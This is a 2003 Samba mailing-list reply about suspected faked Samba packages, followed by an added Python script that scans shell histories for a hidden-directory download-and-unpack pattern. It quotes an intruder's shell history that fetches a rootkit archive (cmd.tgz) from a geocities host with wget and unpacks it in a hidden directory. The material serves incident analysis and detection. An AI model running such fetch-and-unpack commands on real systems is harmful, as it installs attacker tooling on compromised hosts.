Re: [Samba] Faked samba packages / rootkit?



On Sun, 2003-12-28 at 07:27, Markus Schabel wrote:
> Does anybody know of these samba packages?
> 
> http://ftp.cvut.cz/samba/samba-latest.tar.gz

This copy of Samba 3.0.0 matches the signature I downloaded from
samba.org, using GPG.  Your copy may vary however.

> AFAICS they are faked and contain some kind of rootkit (you can see
> this in the history below. the server this history is from is taken
> offline for security reasons, and nobody is there till 7th Jan I
> can't give you more details)

I would suggest that you were running Samba < 2.2.8a, and were rooted by
the commonly available root exploit, and the attacker prefers not to
allow the next passer-by to break into your box too.

> >   182  cd .nlp
> >   183  wget geocities.com/st3lly/cmd.tg
> >   184  wget http://geocities.com/st3lly/cmd.tg
> >   185  wget http://geocities.com/st3lly/cmd.tgz
> >   186  tar zxvf cmd.tgz

I would suggest the rootkits start here...

Andrew Bartlett

-- 
Andrew Bartlett                                 abartlet@pcug.org.au
Manager, Authentication Subsystems, Samba Team  abartlet@samba.org
Student Network Administrator, Hawker College   abartlet@hawkerc.net
http://samba.org     http://build.samba.org     http://hawkerc.net

Attachment: signature.asc
Description: This is a digitally signed message part
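
The sequence in the quoted history (change into a hidden directory, fetch an archive, unpack it there) can be searched for in shell histories on other hosts. The following is an added example, not part of the original message; the function and variable names and the second sample list are constructed for illustration.

```python
import re
import shlex

# Strip the leading entry number that `history` prints before each command.
_ENTRY = re.compile(r"^\s*(?:\d+\s+)?(.*)$")
_FETCHERS = {"wget", "curl", "fetch"}
_ARCHIVE = re.compile(r"\.(?:tgz|tar\.gz|tar\.bz2|tar)$")


def _basename(arg):
    return arg.rstrip("/").rsplit("/", 1)[-1]


def triage_history(lines):
    """Return (archive, source) pairs fetched and unpacked inside a hidden directory."""
    in_hidden_dir = False
    fetched = {}   # archive file name -> argument it was fetched from
    findings = []
    for raw in lines:
        try:
            argv = shlex.split(_ENTRY.match(raw).group(1))
        except ValueError:   # unbalanced quotes: skip the entry
            continue
        if not argv:
            continue
        prog, args = argv[0], argv[1:]
        if prog == "cd":
            # Each cd is judged on its own path; relative moves are not tracked.
            parts = (args[0] if args else "").split("/")
            in_hidden_dir = any(p.startswith(".") and p not in (".", "..") for p in parts)
            fetched.clear()   # downloads belong to the directory they landed in
        elif prog in _FETCHERS:
            for a in args:
                if not a.startswith("-") and _ARCHIVE.search(_basename(a)):
                    fetched[_basename(a)] = a
        elif prog == "tar" and in_hidden_dir:
            findings += [(_basename(a), fetched[_basename(a)])
                         for a in args if _basename(a) in fetched]
    return findings


# Entries 182-186 as quoted in the message above.
QUOTED_HISTORY = ["  182  cd .nlp", "  183  wget geocities.com/st3lly/cmd.tg",
                  "  184  wget http://geocities.com/st3lly/cmd.tg",
                  "  185  wget http://geocities.com/st3lly/cmd.tgz", "  186  tar zxvf cmd.tgz"]
# Constructed contrast: the same steps in an ordinary source directory.
CONSTRUCTED_BENIGN = ["  10  cd /usr/local/src", "  11  wget https://example.org/pkg.tar.gz",
                      "  12  tar zxvf pkg.tar.gz"]

if __name__ == "__main__":
    for name, src in triage_history(QUOTED_HISTORY):
        print(f"unpacked {name} fetched from {src} inside a hidden directory")
```

A hit is a lead for review, not proof of compromise, and an intruder with root can edit or clear the history file.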